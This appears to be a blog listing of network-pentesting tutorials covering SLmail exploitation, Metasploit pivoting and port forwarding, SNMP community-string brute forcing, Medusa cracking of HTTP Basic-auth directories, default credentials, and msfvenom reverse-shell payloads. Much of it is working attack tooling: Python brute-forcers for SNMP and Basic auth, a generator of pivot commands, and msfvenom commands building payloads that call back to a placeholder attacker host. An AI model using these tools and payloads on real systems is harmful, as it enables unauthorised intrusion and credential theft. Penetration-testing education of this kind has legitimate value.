Showing posts with label Network Hacking. Show all posts

Tuesday, 11 April 2017

Exploiting Software Based Vulnerabilities : Attacking Network - Pentesting Network




The vulnerabilities present on a given machine can be software based or hardware based. Today we will see how software based vulnerabilities can be exploited to take over a target machine.


A software based vulnerability is nothing but a coding/programming error that exists in a particular version or series of a piece of software. It can be compromised using a piece of purpose-written malicious code called an "Exploit".


First we identify an SMTP service on our target machine 192.168.131.137:

SLmail smtpd 5.5.0 4433 is running on port 25


Monday, 10 April 2017

Metasploit Pivoting And Port Forwarding : Attacking Network - Pentesting Network





The Metasploit pivoting technique lets an attacker reach and compromise machines that the attacker has no direct network access to, by routing traffic through a machine that has already been compromised.

So the scenario is as follows:

Attacker: 192.168.23.X
The attacker can communicate with System A: 192.168.31.X
Only System A can communicate with System B: 10.1.1.X
The attacker wants to reach System B (and other hosts on the 10.1.1.X network) through System A.
We also assume the attacker does not know in advance which IP addresses exist on the 10.1.1.X network.


Pivoting is performed in the following steps:
  1. Compromise the primary target machine (System A).
  2. Enumerate System A's network interfaces to find the network the attacker cannot reach directly.
  3. Add a route for that network through the Metasploit session on System A.
  4. Run a SOCKS proxy server in Metasploit so other tools can use the route.
  5. Scan the second target machine (System B) through the proxy.
  6. Set up port forwarding to the service on System B.
  7. Run the exploit against System B.
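The following Python helper is an added example, not code from the original post or from Metasploit. It does the bookkeeping behind steps 2, 3, 4 and 6: given the interface list pulled from the System A session, it works out which subnet is new to the attacker and emits the Metasploit commands for the route, the SOCKS proxy and a port forward. The interface list, the attacker's own networks (192.168.23.0/24 and 192.168.31.0/24 from the scenario), the session id 1 and the System B address 10.1.1.5 are all assumptions for the demonstration. The proxy module name auxiliary/server/socks4a is the one Metasploit shipped at the time of the post; current releases call it auxiliary/server/socks_proxy.

```python
import ipaddress

# Constructed sample of what `ipconfig`/`ifconfig` inside the System A session reports
# (the post's addresses, not real hosts): one leg the attacker already reaches, one it does not.
SYSTEM_A_INTERFACES = [
    ("127.0.0.1", "255.0.0.0"),
    ("192.168.31.20", "255.255.255.0"),
    ("10.1.1.20", "255.255.255.0"),
]
ATTACKER_NETWORKS = ["192.168.23.0/24", "192.168.31.0/24"]   # assumed: the attacker's own routes


def pivot_subnets(interfaces, attacker_networks):
    """Step 2: subnets on the session host that the attacker has no direct route to."""
    known = [ipaddress.ip_network(n) for n in attacker_networks]
    found = []
    for address, netmask in interfaces:
        net = ipaddress.ip_network(f"{address}/{netmask}", strict=False)
        if net.is_loopback or net.is_link_local or any(net.overlaps(k) for k in known):
            continue
        if net not in found:
            found.append(net)
    return [str(n) for n in found]


def pivot_commands(session_id, subnets, forwards=(), socks_port=1080):
    """Steps 3, 4 and 6 as Metasploit commands.

    forwards: (local_port, remote_host, remote_port) tuples for meterpreter's portfwd."""
    console = []
    for subnet in subnets:
        net = ipaddress.ip_network(subnet)
        console.append(f"route add {net.network_address} {net.netmask} {session_id}")
    console += ["use auxiliary/server/socks4a", "set SRVHOST 127.0.0.1",
                f"set SRVPORT {socks_port}", "run -j"]
    meterpreter = [f"portfwd add -l {lport} -p {rport} -r {rhost}" for lport, rhost, rport in forwards]
    return {
        "msfconsole": console,                       # run in msfconsole with the session backgrounded
        "meterpreter": meterpreter,                  # run inside `sessions -i <session_id>`
        "proxychains": [f"socks4 127.0.0.1 {socks_port}"],   # line for /etc/proxychains.conf (step 5)
    }


if __name__ == "__main__":
    subnets = pivot_subnets(SYSTEM_A_INTERFACES, ATTACKER_NETWORKS)
    plan = pivot_commands(1, subnets, forwards=[(3389, "10.1.1.5", 3389)])
    for section, lines in plan.items():
        print(f"[{section}]")
        print("\n".join(lines))
```

With the proxychains line in place, step 5 is `proxychains nmap -sT -Pn -p 21,22,80,445 10.1.1.5`: a SOCKS proxy only carries complete TCP connections, so SYN scans and ICMP host discovery do not work through it and `-sT -Pn` is required. The route is only as alive as the session it points at; if the session on System A dies, the route and the proxy stop working silently.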

Hacking SNMP Service Part 2 - The Post Exploitation : Attacking Network - Network Pentesting




In the previous post we identified community strings via an Nmap scan and by brute forcing community string values.

Now we will see how those extracted community strings can be used for post exploitation.

For this we will use the various tools mentioned below.

What Is MIB in SNMP

The SNMP Management Information Base (MIB) is a database containing information
usually related to network management. The database is organized like a tree, where
branches represent different organizations or network functions. The leaves of the tree
(final endpoints) correspond to specific variable values that can then be accessed, and
probed, by an external user. To read more about the MIB tree, refer to the following


For example, the following MIB values correspond to specific Microsoft Windows
SNMP parameters:

1.3.6.1.2.1.25.1.6.0      System Processes
1.3.6.1.2.1.25.4.2.1.2    Running Programs
1.3.6.1.2.1.25.4.2.1.4    Processes Path
1.3.6.1.2.1.25.2.3.1.4    Storage Units
1.3.6.1.2.1.25.6.3.1.2    Software Name
1.3.6.1.4.1.77.1.2.25     User Accounts
1.3.6.1.2.1.6.13.1.3      TCP Local Ports


Hacking SNMP Service Part 1 - The Post Exploitation : Attacking Network - Network Pentesting







SNMP (Simple Network Management Protocol)

Simple Network Management Protocol (SNMP) is a popular protocol for network management. It is used for collecting information from, and configuring, network devices, such as servers, printers, hubs, switches, and routers on an Internet Protocol (IP) network.

With all of this functionality, SNMP can also be used by an attacker to compromise services and IT infrastructure, which we will cover later.


Now we will see how to brute force the community strings of an SNMP service.


But why crack SNMP community strings?

The SNMP read-only community string works like a user id or password. It is sent along with each SNMP Get-Request and allows (or denies) access to a router's or other device's statistics. If the community string is correct, the device responds with the requested information. If the community string is incorrect, the device simply ignores the request and does not respond. That silence is what makes brute forcing straightforward: there is no error message to parse, any reply at all means the guess was right, and a timeout means it was wrong.


What can we do with community strings?

The default community strings are "public" and "private", normally with "ro" (read only) and "rw" (read and write) access respectively.
As the names indicate, read only means the user can only read information, while read and write means the user can also write/update the information exposed through SNMP.
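The following Python is an added example, not code from the original post or from any of the tools it mentions, and it serves both Part 1 (brute forcing the community string) and the MIB table in Part 2 above. It builds an SNMPv1 GetRequest by hand in BER, which makes two things visible that the tools hide: the community string travels in cleartext in every packet, and the brute-force loop is nothing more than "send a Get with each candidate and keep the first one that gets any reply". The recovered string is then used to read one of the OIDs from the Part 2 table. So that it runs offline, the block includes a constructed stand-in agent that accepts only "public" and serves a single made-up value (57) for 1.3.6.1.2.1.25.1.6.0; the agent, that value and the candidate list are assumptions, not data from a real device.

```python
GET_REQUEST, GET_RESPONSE, NO_SUCH_NAME = 0xA0, 0xA2, 2   # PDU tags; SNMPv1 error-status for an unknown OID

# BER encoding, the subset an SNMPv1 message needs
def _length(n):
    if n < 0x80:
        return bytes([n])
    raw = n.to_bytes((n.bit_length() + 7) // 8, "big")
    return bytes([0x80 | len(raw)]) + raw

def tlv(tag, body):
    return bytes([tag]) + _length(len(body)) + body

def enc_int(value):
    return tlv(0x02, value.to_bytes(value.bit_length() // 8 + 1, "big", signed=True))

def enc_oid(oid):
    arcs = [int(a) for a in oid.strip(".").split(".")]
    body = bytearray([40 * arcs[0] + arcs[1]])   # first two arcs share one byte
    for arc in arcs[2:]:
        groups = [arc & 0x7F]                    # base-128, high bit set on every group but the last
        while arc >> 7:
            arc >>= 7
            groups.append(0x80 | (arc & 0x7F))
        body += bytes(reversed(groups))
    return tlv(0x06, bytes(body))

def build_message(pdu_tag, community, request_id, oid, value=None, error_status=0, error_index=0):
    # NULL is the placeholder value in a GetRequest; int -> INTEGER, bytes -> OCTET STRING
    val = tlv(0x05, b"") if value is None else enc_int(value) if isinstance(value, int) else tlv(0x04, value)
    pdu = (enc_int(request_id) + enc_int(error_status) + enc_int(error_index)
           + tlv(0x30, tlv(0x30, enc_oid(oid) + val)))
    return tlv(0x30, enc_int(0) + tlv(0x04, community.encode()) + tlv(pdu_tag, pdu))  # version 0 = v1

# BER decoding
def _read_tlv(buf, pos=0):
    tag, length, pos = buf[pos], buf[pos + 1], pos + 2
    if length & 0x80:                            # long form: low bits give the number of length bytes
        n = length & 0x7F
        length, pos = int.from_bytes(buf[pos:pos + n], "big"), pos + n
    return tag, buf[pos:pos + length], pos + length

def _children(body):
    items, pos = [], 0
    while pos < len(body):
        tag, val, pos = _read_tlv(body, pos)
        items.append((tag, val))
    return items

def dec_oid(body):
    arcs, acc = [body[0] // 40, body[0] % 40], 0
    for b in body[1:]:
        acc = (acc << 7) | (b & 0x7F)
        if not b & 0x80:
            arcs.append(acc)
            acc = 0
    return ".".join(map(str, arcs))

def _dec_value(tag, body):
    if tag in (0x02, 0x41, 0x42, 0x43):          # INTEGER, Counter32, Gauge32, TimeTicks
        return int.from_bytes(body, "big", signed=(tag == 0x02))
    return None if tag == 0x05 else bytes(body)  # NULL, else OCTET STRING (or anything else, raw)

def parse_message(packet):
    _, body, _ = _read_tlv(packet)
    (_, _ver), (_, community), (pdu_tag, pdu) = _children(body)
    (_, rid), (_, err), (_, _idx), (_, vbl) = _children(pdu)
    varbinds = []
    for _, vb in _children(vbl):
        (_, oid), (vtag, val) = _children(vb)
        varbinds.append((dec_oid(oid), _dec_value(vtag, val)))
    return {"pdu": pdu_tag, "community": community.decode(errors="replace"),
            "request_id": int.from_bytes(rid, "big"), "error_status": int.from_bytes(err, "big"),
            "varbinds": varbinds}

# Part 1: brute force. A v1/v2c agent answers a correct community and stays silent on a wrong one,
# so "a reply whose request-id matches ours" is the whole success test.
def brute_force(transport, candidates, oid="1.3.6.1.2.1.1.1.0"):
    for request_id, community in enumerate(candidates, start=1):
        reply = transport(build_message(GET_REQUEST, community, request_id, oid))
        if reply is not None and parse_message(reply)["request_id"] == request_id:
            return community
    return None

# Part 2: read one value from the MIB table above with the recovered string
def snmp_get(transport, community, oid, request_id=1):
    reply = transport(build_message(GET_REQUEST, community, request_id, oid))
    msg = parse_message(reply) if reply is not None else None
    return None if msg is None or msg["error_status"] else msg["varbinds"][0][1]

# Constructed stand-in agent (not a real device) so the block runs offline
CONSTRUCTED_MIB = {"1.3.6.1.2.1.25.1.6.0": 57}     # hrSystemProcesses, "System Processes" in the table above

def fake_agent(packet, community="public", mib=CONSTRUCTED_MIB):
    req = parse_message(packet)
    if req["community"] != community:
        return None                                 # silent drop, exactly like a real v1/v2c agent
    oid = req["varbinds"][0][0]
    if oid not in mib:
        return build_message(GET_RESPONSE, community, req["request_id"], oid, None, NO_SUCH_NAME, 1)
    return build_message(GET_RESPONSE, community, req["request_id"], oid, mib[oid])
```

`brute_force(fake_agent, ["private", "manager", "public"])` returns "public", and `snmp_get(fake_agent, "public", "1.3.6.1.2.1.25.1.6.0")` returns 57. Against a real agent the `transport` argument is a function that sends the packet with a UDP socket to port 161, waits with a timeout of about a second, and returns the received datagram or `None` on timeout; the brute-force loop itself does not change. Two practical caveats: UDP loss looks identical to a wrong community, so a candidate that times out is worth one retry, and many agents send an authenticationFailure trap to their manager on every bad string, so the attempts are not silent on the defender's side.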

Sunday, 9 April 2017

Cracking SSH FTP HTTP FTP : Attacking Network - Network Pentesting





Apart from using default credentials, we can also brute force various services to get into them.


1) HTTP (htaccess protected web directory) 

Medusa comes to the rescue when it comes to cracking Basic Authorization or a password-protected web directory.

Medusa command line for cracking Basic Authorization or a password-protected web directory:

 medusa -h 192.168.11.219 -u admin -P Desktop/demo/password -M http -m DIR:/secret -T 10


Medusa will try to crack the password-protected web directory /secret using the user admin and the passwords provided in the password list, with 10 parallel threads.
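Medusa does the work here, but it helps to see what its http module does per attempt. The following Python is an added example, not code from the post or from Medusa: it builds the `Authorization: Basic` header the same way a browser would, walks a wordlist until the server stops answering 401, and includes a constructed local stand-in for the .htaccess-protected /secret directory (credential admin:s3cret, a made-up value) so it runs offline. The username admin and the wordlist are assumptions; against the post's target the URL would be http://192.168.11.219/secret/ with the real password file.

```python
import base64
import threading
import urllib.error
import urllib.request
from http.server import BaseHTTPRequestHandler, HTTPServer


def basic_auth_header(user, password):
    """What the client sends: base64(user:password). Encoded, not encrypted."""
    return "Basic " + base64.b64encode(f"{user}:{password}".encode()).decode()


def crack_basic_auth(attempt, user, wordlist):
    """attempt(header_value) -> HTTP status. A 401 means "try again"; anything else means
    the server accepted the credential (200, or a redirect/403 past the auth check)."""
    for password in wordlist:
        if attempt(basic_auth_header(user, password)) != 401:
            return password
    return None


def http_attempt(url, timeout=5.0):
    """Build an attempt() for a real URL; urllib raises on 401, so the code comes from the error."""
    def attempt(header_value):
        req = urllib.request.Request(url, headers={"Authorization": header_value})
        try:
            with urllib.request.urlopen(req, timeout=timeout) as resp:
                return resp.status
        except urllib.error.HTTPError as e:
            return e.code
    return attempt


# Constructed stand-in for the protected /secret directory (made-up credential, not a real host).
CONSTRUCTED_USERS = {"admin": "s3cret"}


class ProtectedDir(BaseHTTPRequestHandler):
    def do_GET(self):
        auth = self.headers.get("Authorization", "")
        ok = False
        if auth.startswith("Basic "):
            try:
                user, _, pw = base64.b64decode(auth[6:]).decode().partition(":")
                ok = CONSTRUCTED_USERS.get(user) == pw
            except (ValueError, UnicodeDecodeError):
                ok = False
        if ok:
            self.send_response(200)
            self.end_headers()
            self.wfile.write(b"secret page\n")
        else:                                   # what .htaccess/.htpasswd protection sends back
            self.send_response(401)
            self.send_header("WWW-Authenticate", 'Basic realm="secret"')
            self.end_headers()

    def log_message(self, *args):               # keep the demo quiet
        pass


def demo_against_local_server(wordlist=("123456", "password", "s3cret", "admin")):
    """Run the cracker against the stand-in server on a random loopback port."""
    server = HTTPServer(("127.0.0.1", 0), ProtectedDir)
    threading.Thread(target=server.serve_forever, daemon=True).start()
    try:
        url = f"http://127.0.0.1:{server.server_address[1]}/secret/"
        return crack_basic_auth(http_attempt(url), "admin", wordlist)
    finally:
        server.shutdown()
        server.server_close()


if __name__ == "__main__":
    print("cracked:", demo_against_local_server())
```

For a real target, pass `http_attempt("http://192.168.11.219/secret/")` and the lines of the password file (stripped of newlines) to `crack_basic_auth`; Medusa's `-T 10` is the equivalent of running ten of these loops over disjoint slices of the list. Because the credential is only base64 in the header, anyone who can see the HTTP traffic gets it without cracking anything, which is the other reason Basic auth over plain HTTP is a finding on its own.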

Default Credentials Vulnerability : Attacking Network - Network Pentesting






Hello reader, we have talked a lot about web hacking, and today I decided to blog some interesting things about attacking networks (network pentesting).

For your information, for demonstration purposes I am using a Vyatta VM, which you can also download from http://packages.vyos.net/iso/release/1.1.7/

Today we will look at a common vulnerability that many admins introduce by keeping the default configuration, or in other words, keeping the default credentials.

So we have a target machine at 192.168.131.135 and our attacking machine at 192.168.131.134.

Let's do an Nmap service scan on our target machine:

nmap -sV 192.168.131.135 



So we found ports 22, 23, 80 and 443 open.
Of these, 22 (SSH) and 23 (Telnet) look interesting to us, since the credentials for those services may still be the defaults.

Generating Metasploit Payloads : Creating Metasploit Reverse Shell





Below are the different types of Metasploit payloads we can use to get a reverse shell from the victim machine.

These payloads are selected in Metasploit with set payload <payload name>; before that, we have to start a multi handler, which is configured with use exploit/multi/handler.

The payloads below require certain options to be set, such as LHOST and LPORT.


Operating System Based Binary Shells


Linux

msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=attackerip LPORT=attackerport -f elf > shell.elf
Windows

msfvenom -p windows/meterpreter/reverse_tcp LHOST=attackerip LPORT=attackerport -f exe > shell.exe
Mac

msfvenom -p osx/x86/shell_reverse_tcp LHOST=attackerip LPORT=attackerport -f macho > shell.macho

Web Payloads: usually for RFI, SQL injection